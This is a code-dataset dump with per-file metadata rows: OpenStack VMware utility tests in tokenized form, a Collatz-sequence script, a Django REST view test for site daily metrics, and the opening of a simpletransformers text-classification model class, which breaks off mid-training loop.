name|'test_get_folder_child_entry_matched'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_entity'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
string|"'fake-name'"
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ret'
op|','
name|'child_entity'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity'
op|','
string|"'name'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_folder_path_ref_cache
dedent|''
dedent|''
name|'def'
name|'test_folder_path_ref_cache'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'path'
op|'='
string|"'OpenStack/Project (e2b86092bf064181ade43deb3188f8e4)'"
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vm_util'
op|'.'
name|'folder_ref_cache_get'
op|'('
name|'path'
op|')'
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'folder_ref_cache_update'
op|'('
name|'path'
op|','
string|"'fake-ref'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-ref'"
op|','
name|'vm_util'
op|'.'
name|'folder_ref_cache_get'
op|'('
name|'path'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_name
dedent|''
name|'def'
name|'test_get_vm_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
name|'uuid'
newline|'\n'
name|'name'
op|'='
name|'vm_util'
op|'.'
name|'_get_vm_name'
op|'('
name|'None'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'name'
op|')'
newline|'\n'
nl|'\n'
name|'display_name'
op|'='
string|"'fira'"
newline|'\n'
name|'expected'
op|'='
string|"'fira (%s)'"
op|'%'
name|'uuid'
newline|'\n'
name|'name'
op|'='
name|'vm_util'
op|'.'
name|'_get_vm_name'
op|'('
name|'display_name'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'name'
op|')'
newline|'\n'
nl|'\n'
name|'display_name'
op|'='
string|"'X'"
op|'*'
number|'255'
newline|'\n'
name|'expected'
op|'='
string|"'%s (%s)'"
op|'%'
op|'('
string|"'X'"
op|'*'
number|'41'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'name'
op|'='
name|'vm_util'
op|'.'
name|'_get_vm_name'
op|'('
name|'display_name'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'name'
op|')'
op|','
number|'80'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'_get_vm_name'"
op|','
name|'return_value'
op|'='
string|"'fake-name'"
op|')'
newline|'\n'
DECL|member|test_rename_vm
name|'def'
name|'test_rename_vm'
op|'('
name|'self'
op|','
name|'mock_get_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake_rename_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_call_method'
op|','
name|'_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'rename_vm'
op|'('
name|'session'
op|','
string|"'fake-ref'"
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
nl|'\n'
string|"'Rename_Task'"
op|','
string|"'fake-ref'"
op|','
name|'newName'
op|'='
string|"'fake-name'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
string|"'fake_rename_task'"
op|')'
newline|'\n'
dedent|''
name|'mock_get_name'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'display_name'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'driver'
op|'.'
name|'VMwareAPISession'
op|','
string|"'vim'"
op|','
name|'stubs'
op|'.'
name|'fake_vim_prop'
op|')'
newline|'\n'
DECL|class|VMwareVMUtilGetHostRefTestCase
name|'class'
name|'VMwareVMUtilGetHostRefTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
comment|'# N.B. Mocking on the class only mocks test_*(), but we need'
nl|'\n'
comment|'# VMwareAPISession.vim to be mocked in both setUp and tests. Not mocking in'
nl|'\n'
comment|'# setUp causes object initialisation to fail. Not mocking in tests results'
nl|'\n'
comment|'# in vim calls not using FakeVim.'
nl|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'driver'
op|'.'
name|'VMwareAPISession'
op|','
string|"'vim'"
op|','
name|'stubs'
op|'.'
name|'fake_vim_prop'
op|')'
newline|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVMUtilGetHostRefTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'vm_refs_cache_reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'session'
op|'='
name|'driver'
op|'.'
name|'VMwareAPISession'
op|'('
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a fake VirtualMachine running on a known host'
nl|'\n'
name|'self'
op|'.'
name|'host_ref'
op|'='
name|'list'
op|'('
name|'fake'
op|'.'
name|'_db_content'
op|'['
string|"'HostSystem'"
op|']'
op|'.'
name|'keys'
op|'('
op|')'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'vm_ref'
op|'='
name|'fake'
op|'.'
name|'create_vm'
op|'('
name|'host_ref'
op|'='
name|'self'
op|'.'
name|'host_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_vm_ref'"
op|')'
newline|'\n'
DECL|member|test_get_host_ref_for_vm
name|'def'
name|'test_get_host_ref_for_vm'
op|'('
name|'self'
op|','
name|'mock_get_vm_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_get_vm_ref'
op|'.'
name|'return_value'
op|'='
name|'self'
op|'.'
name|'vm_ref'
newline|'\n'
nl|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'get_host_ref_for_vm'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
nl|'\n'
name|'mock_get_vm_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'host_ref'
op|','
name|'ret'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_vm_ref'"
op|')'
newline|'\n'
DECL|member|test_get_host_name_for_vm
name|'def'
name|'test_get_host_name_for_vm'
op|'('
name|'self'
op|','
name|'mock_get_vm_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_get_vm_ref'
op|'.'
name|'return_value'
op|'='
name|'self'
op|'.'
name|'vm_ref'
newline|'\n'
nl|'\n'
name|'host'
op|'='
name|'fake'
op|'.'
name|'_get_object'
op|'('
name|'self'
op|'.'
name|'host_ref'
op|')'
newline|'\n'
nl|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'get_host_name_for_vm'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
nl|'\n'
name|'mock_get_vm_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'host'
op|'.'
name|'name'
op|','
name|'ret'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.746808 | 111 | 0.62103 |
92f38a48ab4c0bf634d58e7bddae67b332b65bca | 266 | py | Python | src/014/p014.py | Ernulphus/polyglot-euler | a5b59b08e6844f0c278bff5ab798acefa95749f3 | [
"MIT"
] | 67 | 2017-12-05T20:44:33.000Z | 2022-03-04T08:13:16.000Z | src/014/p014.py | Ernulphus/polyglot-euler | a5b59b08e6844f0c278bff5ab798acefa95749f3 | [
"MIT"
] | 49 | 2018-03-26T14:20:26.000Z | 2021-08-17T09:08:55.000Z | src/014/p014.py | Ernulphus/polyglot-euler | a5b59b08e6844f0c278bff5ab798acefa95749f3 | [
"MIT"
] | 17 | 2018-03-25T23:40:47.000Z | 2022-03-04T08:13:44.000Z | def collatz(n):
seq = [n]
while n > 1:
if n % 2 == 0:
n = n / 2
else:
n = 3 * n + 1
seq.append(int(n))
return seq
sizes = [len(collatz(i)) for i in range(1, int(1e6))]
print(sizes.index(max(sizes)) + 1)
| 17.733333 | 53 | 0.443609 |
c117f17480d1bc6e45e99b4815a02b06aed9ec7f | 5,520 | py | Python | tests/views/test_site_daily_metrics_view.py | groovetch/edx-figures | a69fc1195c05176ac7dae90b337dd77f4bd9679f | [
"MIT"
] | 43 | 2018-05-29T20:01:25.000Z | 2021-12-02T09:43:17.000Z | tests/views/test_site_daily_metrics_view.py | groovetch/edx-figures | a69fc1195c05176ac7dae90b337dd77f4bd9679f | [
"MIT"
] | 330 | 2018-05-30T17:06:15.000Z | 2022-03-16T15:52:22.000Z | tests/views/test_site_daily_metrics_view.py | groovetch/edx-figures | a69fc1195c05176ac7dae90b337dd77f4bd9679f | [
"MIT"
] | 40 | 2018-10-06T00:15:58.000Z | 2022-02-14T12:44:45.000Z | '''Tests Figures SiteDailyMetricsViewSet class
'''
from __future__ import absolute_import
import datetime
from dateutil.parser import parse
from dateutil.rrule import rrule, DAILY
import pytest
from django.contrib.auth import get_user_model
from rest_framework.test import (
APIRequestFactory,
# RequestsClient, Not supported in older rest_framework versions
force_authenticate,
)
from figures.models import SiteDailyMetrics
from figures.pagination import FiguresLimitOffsetPagination
from figures.views import SiteDailyMetricsViewSet
from figures.serializers import SiteSerializer
from tests.factories import SiteDailyMetricsFactory, UserFactory
from tests.views.base import BaseViewTest
from tests.helpers import django_filters_pre_v2
TEST_DATA = [
{}
]
def generate_sdm_series(site, first_day, last_day):
return [SiteDailyMetricsFactory(site=site, date_for=dt)
for dt in rrule(DAILY, dtstart=first_day, until=last_day)]
@pytest.mark.django_db
class TestSiteDailyMetricsView(BaseViewTest):
'''
Note: This test class duplicates some of the code in
test_serializers.TestSiteDailyMetricsSerializer
We might want to do the date handling/comparing code as a mix-in
TODO: AFter we finish and commit the view test for this, set the serialization
type for the dates. This should simplify this a lot
# http://www.django-rest-framework.org/api-guide/fields/#date-and-time-fields
'''
request_path = 'api/site-daily-metrics'
view_class = SiteDailyMetricsViewSet
@pytest.fixture(autouse=True)
def setup(self, db):
super(TestSiteDailyMetricsView, self).setup(db)
self.first_day = parse('2018-01-01')
self.last_day = parse('2018-03-31')
self.date_fields = set(['date_for', 'created', 'modified', ])
self.expected_results_keys = set([o.name for o in SiteDailyMetrics._meta.fields])
field_names = (o.name for o in SiteDailyMetrics._meta.fields
if o.name not in self.date_fields)
self.metrics = generate_sdm_series(self.site, self.first_day, self.last_day)
def test_get_last_day(self):
pass
@pytest.mark.parametrize('first_day, last_day', [
('2018-02-01', '2018-02-28',),
])
def test_get_by_date_range(self, first_day, last_day):
'''
Note: This test is sensitive in the order data are compared. It expects
that records are retrieved by date_for, descending.
TODO: Add more date ranges
'''
if django_filters_pre_v2():
endpoint = '{}?date_0={}&date_1={}'.format(
self.request_path, first_day, last_day)
else:
endpoint = '{}?date_after={}&date_before={}'.format(
self.request_path, first_day, last_day)
# TODO Is this backward compatible?
expected_data = SiteDailyMetrics.objects.filter(
date_for__range=(first_day, last_day))
factory = APIRequestFactory()
request = factory.get(endpoint)
force_authenticate(request, user=self.staff_user)
view = self.view_class.as_view({'get': 'list'})
response = view(request)
assert response.status_code == 200
# Expect the following format for pagination
# {
# "count": 2,
# "next": null, # or a url
# "previous": null, # or a url
# "results": [
# ... # list of the results
# ]
# }
assert set(response.data.keys()) == set(
['count', 'next', 'previous', 'results', ])
assert len(response.data['results']) == FiguresLimitOffsetPagination.default_limit
# Hack: Check date and datetime values explicitly
for data in response.data['results']:
db_rec = expected_data.get(id=data['id'])
assert data['date_for'] == str(db_rec.date_for)
assert parse(data['created']) == db_rec.created
assert parse(data['modified']) == db_rec.modified
check_fields = self.expected_results_keys - self.date_fields - set(['site'])
for field_name in check_fields:
assert data[field_name] == getattr(db_rec, field_name)
@pytest.mark.xfail
def test_create(self):
"""
When adding the site serialized data, this test fails with:
AssertionError: The `.create()` method does not support writable
nestedfields by default.
Write an explicit `.create()` method for serializer
`figures.serializers.SiteDailyMetricsSerializer`, or set `read_only=True`
on nested serializer fields.
Note: We don't need write functionality with this view as of version 0.2.0
"""
data = dict(
date_for='2020-01-01',
cumulative_active_user_count=1,
todays_active_user_count=2,
total_user_count=3,
course_count=4,
total_enrollment_count=5,
mau=6,
)
# Might not need to set format='json'
request = APIRequestFactory().post(
self.request_path, data, format='json')
force_authenticate(request, user=self.staff_user)
view = SiteDailyMetricsViewSet.as_view({'post': 'create'})
response = view(request)
assert response.status_code == 201
assert 'id' in list(response.data.keys())
for key in data.keys():
assert response.data[key] == data[key]
| 36.078431 | 90 | 0.648732 |
c36f6860c89a3529a9e42691689d7f1c3941b287 | 58,001 | py | Python | simpletransformers/classification/classification_model.py | asmsuechan/simpletransformers | b6c1c72aea6b00baa40bbd5cc2510a947a9ca181 | [
"Apache-2.0"
] | 1 | 2021-04-21T02:25:30.000Z | 2021-04-21T02:25:30.000Z | simpletransformers/classification/classification_model.py | pranavnt/simpletransformers | bd4c3972e02ebf1d5258c682e5a7e8ee70b98c06 | [
"Apache-2.0"
] | null | null | null | simpletransformers/classification/classification_model.py | pranavnt/simpletransformers | bd4c3972e02ebf1d5258c682e5a7e8ee70b98c06 | [
"Apache-2.0"
] | 1 | 2020-11-05T03:39:16.000Z | 2020-11-05T03:39:16.000Z | #!/usr/bin/env python
# coding: utf-8
from __future__ import absolute_import, division, print_function
import json
import logging
import math
import os
import random
import warnings
from dataclasses import asdict
from multiprocessing import cpu_count
import numpy as np
import pandas as pd
import torch
from scipy.stats import mode, pearsonr
from sklearn.metrics import (
confusion_matrix,
label_ranking_average_precision_score,
matthews_corrcoef,
mean_squared_error,
)
from tensorboardX import SummaryWriter
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm.auto import tqdm, trange
from tqdm.contrib import tenumerate
from transformers import (
WEIGHTS_NAME,
AdamW,
AlbertConfig,
AlbertTokenizer,
BertConfig,
BertTokenizer,
CamembertConfig,
CamembertTokenizer,
DistilBertConfig,
DistilBertTokenizer,
ElectraConfig,
ElectraTokenizer,
FlaubertConfig,
FlaubertTokenizer,
LongformerConfig,
LongformerForSequenceClassification,
LongformerTokenizer,
MobileBertConfig,
MobileBertForSequenceClassification,
MobileBertTokenizer,
RobertaConfig,
RobertaTokenizer,
XLMConfig,
XLMRobertaConfig,
XLMRobertaTokenizer,
XLMTokenizer,
XLNetConfig,
XLNetTokenizer,
get_linear_schedule_with_warmup,
)
from simpletransformers.classification.classification_utils import (
InputExample,
LazyClassificationDataset,
convert_examples_to_features,
)
from simpletransformers.classification.transformer_models.albert_model import AlbertForSequenceClassification
from simpletransformers.classification.transformer_models.bert_model import BertForSequenceClassification
from simpletransformers.classification.transformer_models.camembert_model import CamembertForSequenceClassification
from simpletransformers.classification.transformer_models.distilbert_model import DistilBertForSequenceClassification
from simpletransformers.classification.transformer_models.flaubert_model import FlaubertForSequenceClassification
from simpletransformers.classification.transformer_models.roberta_model import RobertaForSequenceClassification
from simpletransformers.classification.transformer_models.xlm_model import XLMForSequenceClassification
from simpletransformers.classification.transformer_models.xlm_roberta_model import XLMRobertaForSequenceClassification
from simpletransformers.classification.transformer_models.xlnet_model import XLNetForSequenceClassification
from simpletransformers.config.global_args import global_args
from simpletransformers.config.model_args import ClassificationArgs
from simpletransformers.custom_models.models import ElectraForSequenceClassification
try:
import wandb
wandb_available = True
except ImportError:
wandb_available = False
logger = logging.getLogger(__name__)
class ClassificationModel:
def __init__(
self, model_type, model_name, num_labels=None, weight=None, args=None, use_cuda=True, cuda_device=-1, **kwargs,
):
"""
Initializes a ClassificationModel model.
Args:
model_type: The type of model (bert, xlnet, xlm, roberta, distilbert)
model_name: The exact architecture and trained weights to use. This may be a Hugging Face Transformers compatible pre-trained model, a community model, or the path to a directory containing model files.
num_labels (optional): The number of labels or classes in the dataset.
weight (optional): A list of length num_labels containing the weights to assign to each label for loss calculation.
args (optional): Default args will be used if this parameter is not provided. If provided, it should be a dict containing the args that should be changed in the default args.
use_cuda (optional): Use GPU if available. Setting to False will force model to use CPU only.
cuda_device (optional): Specific GPU that should be used. Will use the first available GPU by default.
**kwargs (optional): For providing proxies, force_download, resume_download, cache_dir and other options specific to the 'from_pretrained' implementation where this will be supplied.
""" # noqa: ignore flake8"
MODEL_CLASSES = {
"albert": (AlbertConfig, AlbertForSequenceClassification, AlbertTokenizer),
"bert": (BertConfig, BertForSequenceClassification, BertTokenizer),
"camembert": (CamembertConfig, CamembertForSequenceClassification, CamembertTokenizer),
"distilbert": (DistilBertConfig, DistilBertForSequenceClassification, DistilBertTokenizer),
"electra": (ElectraConfig, ElectraForSequenceClassification, ElectraTokenizer),
"flaubert": (FlaubertConfig, FlaubertForSequenceClassification, FlaubertTokenizer),
"longformer": (LongformerConfig, LongformerForSequenceClassification, LongformerTokenizer),
"mobilebert": (MobileBertConfig, MobileBertForSequenceClassification, MobileBertTokenizer),
"roberta": (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer),
"xlnet": (XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer),
"xlm": (XLMConfig, XLMForSequenceClassification, XLMTokenizer),
"xlmroberta": (XLMRobertaConfig, XLMRobertaForSequenceClassification, XLMRobertaTokenizer),
}
self.args = self._load_model_args(model_name)
if isinstance(args, dict):
self.args.update_from_dict(args)
elif isinstance(args, ClassificationArgs):
self.args = args
if "sweep_config" in kwargs:
sweep_config = kwargs.pop("sweep_config")
sweep_values = {key: value["value"] for key, value in sweep_config.as_dict().items() if key != "_wandb"}
self.args.update_from_dict(sweep_values)
if self.args.manual_seed:
random.seed(self.args.manual_seed)
np.random.seed(self.args.manual_seed)
torch.manual_seed(self.args.manual_seed)
if self.args.n_gpu > 0:
torch.cuda.manual_seed_all(self.args.manual_seed)
if self.args.labels_list:
if num_labels:
assert num_labels == len(self.args.labels_list)
if self.args.labels_map:
try:
assert list(self.args.labels_map.keys()) == self.args.labels_list
except AssertionError:
assert [int(key) for key in list(self.args.labels_map.keys())] == self.args.labels_list
self.args.labels_map = {int(key): value for key, value in self.args.labels_map.items()}
else:
self.args.labels_map = {label: i for i, label in enumerate(self.args.labels_list)}
else:
len_labels_list = 2 if not num_labels else num_labels
self.args.labels_list = [i for i in range(len_labels_list)]
config_class, model_class, tokenizer_class = MODEL_CLASSES[model_type]
if num_labels:
self.config = config_class.from_pretrained(model_name, num_labels=num_labels, **self.args.config)
self.num_labels = num_labels
else:
self.config = config_class.from_pretrained(model_name, **self.args.config)
self.num_labels = self.config.num_labels
self.weight = weight
if use_cuda:
if torch.cuda.is_available():
if cuda_device == -1:
self.device = torch.device("cuda")
else:
self.device = torch.device(f"cuda:{cuda_device}")
else:
raise ValueError(
"'use_cuda' set to True when cuda is unavailable."
" Make sure CUDA is available or set use_cuda=False."
)
else:
self.device = "cpu"
if self.weight:
self.model = model_class.from_pretrained(
model_name, config=self.config, weight=torch.Tensor(self.weight).to(self.device), **kwargs,
)
else:
self.model = model_class.from_pretrained(model_name, config=self.config, **kwargs)
self.results = {}
if not use_cuda:
self.args.fp16 = False
self.tokenizer = tokenizer_class.from_pretrained(model_name, do_lower_case=self.args.do_lower_case, **kwargs)
self.args.model_name = model_name
self.args.model_type = model_type
if model_type in ["camembert", "xlmroberta"]:
warnings.warn(
f"use_multiprocessing automatically disabled as {model_type}"
" fails when using multiprocessing for feature conversion."
)
self.args.use_multiprocessing = False
if self.args.wandb_project and not wandb_available:
warnings.warn("wandb_project specified but wandb is not available. Wandb disabled.")
self.args.wandb_project = None
def train_model(
self,
train_df,
multi_label=False,
output_dir=None,
show_running_loss=True,
args=None,
eval_df=None,
verbose=True,
**kwargs,
):
"""
Trains the model using 'train_df'
Args:
train_df: Pandas Dataframe containing at least two columns. If the Dataframe has a header, it should contain a 'text' and a 'labels' column. If no header is present,
the Dataframe should contain at least two columns, with the first column containing the text, and the second column containing the label. The model will be trained on this Dataframe.
output_dir: The directory where model files will be saved. If not given, self.args.output_dir will be used.
show_running_loss (optional): Set to False to prevent running loss from being printed to console. Defaults to True.
args (optional): Optional changes to the args dict of the model. Any changes made will persist for the model.
eval_df (optional): A DataFrame against which evaluation will be performed when evaluate_during_training is enabled. Is required if evaluate_during_training is enabled.
**kwargs: Additional metrics that should be used. Pass in the metrics as keyword arguments (name of metric: function to use). E.g. f1=sklearn.metrics.f1_score.
A metric function should take in two parameters. The first parameter will be the true labels, and the second parameter will be the predictions.
Returns:
None
""" # noqa: ignore flake8"
if args:
self.args.update_from_dict(args)
if self.args.silent:
show_running_loss = False
if self.args.evaluate_during_training and eval_df is None:
raise ValueError(
"evaluate_during_training is enabled but eval_df is not specified."
" Pass eval_df to model.train_model() if using evaluate_during_training."
)
if not output_dir:
output_dir = self.args.output_dir
if os.path.exists(output_dir) and os.listdir(output_dir) and not self.args.overwrite_output_dir:
raise ValueError(
"Output directory ({}) already exists and is not empty."
" Use --overwrite_output_dir to overcome.".format(output_dir)
)
self._move_model_to_device()
if isinstance(train_df, str) and self.args.lazy_loading:
if self.args.sliding_window:
raise ValueError("Lazy loading cannot be used with sliding window.")
train_dataset = LazyClassificationDataset(train_df, self.tokenizer, self.args)
else:
if self.args.lazy_loading:
raise ValueError("Input must be given as a path to a file when using lazy loading")
if "text" in train_df.columns and "labels" in train_df.columns:
train_examples = [
InputExample(i, text, None, label)
for i, (text, label) in enumerate(zip(train_df["text"].astype(str), train_df["labels"]))
]
elif "text_a" in train_df.columns and "text_b" in train_df.columns:
train_examples = [
InputExample(i, text_a, text_b, label)
for i, (text_a, text_b, label) in enumerate(
zip(train_df["text_a"].astype(str), train_df["text_b"].astype(str), train_df["labels"])
)
]
else:
warnings.warn(
"Dataframe headers not specified. Falling back to using column 0 as text and column 1 as labels."
)
train_examples = [
InputExample(i, text, None, label)
for i, (text, label) in enumerate(zip(train_df.iloc[:, 0], train_df.iloc[:, 1]))
]
train_dataset = self.load_and_cache_examples(train_examples, verbose=verbose)
train_sampler = RandomSampler(train_dataset)
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
batch_size=self.args.train_batch_size,
num_workers=self.args.dataloader_num_workers,
)
os.makedirs(output_dir, exist_ok=True)
global_step, tr_loss = self.train(
train_dataloader,
output_dir,
multi_label=multi_label,
show_running_loss=show_running_loss,
eval_df=eval_df,
verbose=verbose,
**kwargs,
)
# model_to_save = self.model.module if hasattr(self.model, "module") else self.model
# model_to_save.save_pretrained(output_dir)
# self.tokenizer.save_pretrained(output_dir)
# torch.save(self.args, os.path.join(output_dir, "training_args.bin"))
self._save_model(model=self.model)
if verbose:
logger.info(" Training of {} model complete. Saved to {}.".format(self.args.model_type, output_dir))
def train(
self,
train_dataloader,
output_dir,
multi_label=False,
show_running_loss=True,
eval_df=None,
verbose=True,
**kwargs,
):
"""
Trains the model on train_dataset.
Utility function to be used by the train_model() method. Not intended to be used directly.
"""
model = self.model
args = self.args
tb_writer = SummaryWriter(logdir=args.tensorboard_dir)
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = []
custom_parameter_names = set()
for group in self.args.custom_parameter_groups:
params = group.pop("params")
custom_parameter_names.update(params)
param_group = {**group}
param_group["params"] = [p for n, p in model.named_parameters() if n in params]
optimizer_grouped_parameters.append(param_group)
for group in self.args.custom_layer_parameters:
layer_number = group.pop("layer")
layer = f"layer.{layer_number}."
group_d = {**group}
group_nd = {**group}
group_nd["weight_decay"] = 0.0
params_d = []
params_nd = []
for n, p in model.named_parameters():
if n not in custom_parameter_names and layer in n:
if any(nd in n for nd in no_decay):
params_nd.append(p)
else:
params_d.append(p)
custom_parameter_names.add(n)
group_d["params"] = params_d
group_nd["params"] = params_nd
optimizer_grouped_parameters.append(group_d)
optimizer_grouped_parameters.append(group_nd)
if not self.args.train_custom_parameters_only:
optimizer_grouped_parameters.extend(
[
{
"params": [
p
for n, p in model.named_parameters()
if n not in custom_parameter_names and not any(nd in n for nd in no_decay)
],
"weight_decay": args.weight_decay,
},
{
"params": [
p
for n, p in model.named_parameters()
if n not in custom_parameter_names and any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
)
warmup_steps = math.ceil(t_total * args.warmup_ratio)
args.warmup_steps = warmup_steps if args.warmup_steps == 0 else args.warmup_steps
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
global_step = 0
tr_loss, logging_loss = 0.0, 0.0
model.zero_grad()
train_iterator = trange(int(args.num_train_epochs), desc="Epoch", disable=args.silent, mininterval=0)
epoch_number = 0
best_eval_metric = None
early_stopping_counter = 0
steps_trained_in_current_epoch = 0
epochs_trained = 0
current_loss = "Initializing"
if args.model_name and os.path.exists(args.model_name):
try:
# set global_step to gobal_step of last saved checkpoint from model path
checkpoint_suffix = args.model_name.split("/")[-1].split("-")
if len(checkpoint_suffix) > 2:
checkpoint_suffix = checkpoint_suffix[1]
else:
checkpoint_suffix = checkpoint_suffix[-1]
global_step = int(checkpoint_suffix)
epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
steps_trained_in_current_epoch = global_step % (
len(train_dataloader) // args.gradient_accumulation_steps
)
logger.info(" Continuing training from checkpoint, will skip to saved global_step")
logger.info(" Continuing training from epoch %d", epochs_trained)
logger.info(" Continuing training from global step %d", global_step)
logger.info(" Will skip the first %d steps in the current epoch", steps_trained_in_current_epoch)
except ValueError:
logger.info(" Starting fine-tuning.")
if args.evaluate_during_training:
training_progress_scores = self._create_training_progress_scores(multi_label, **kwargs)
if args.wandb_project:
wandb.init(project=args.wandb_project, config={**asdict(args)}, **args.wandb_kwargs)
wandb.watch(self.model)
if args.fp16:
from torch.cuda import amp
scaler = amp.GradScaler()
model.train()
for _ in train_iterator:
if epochs_trained > 0:
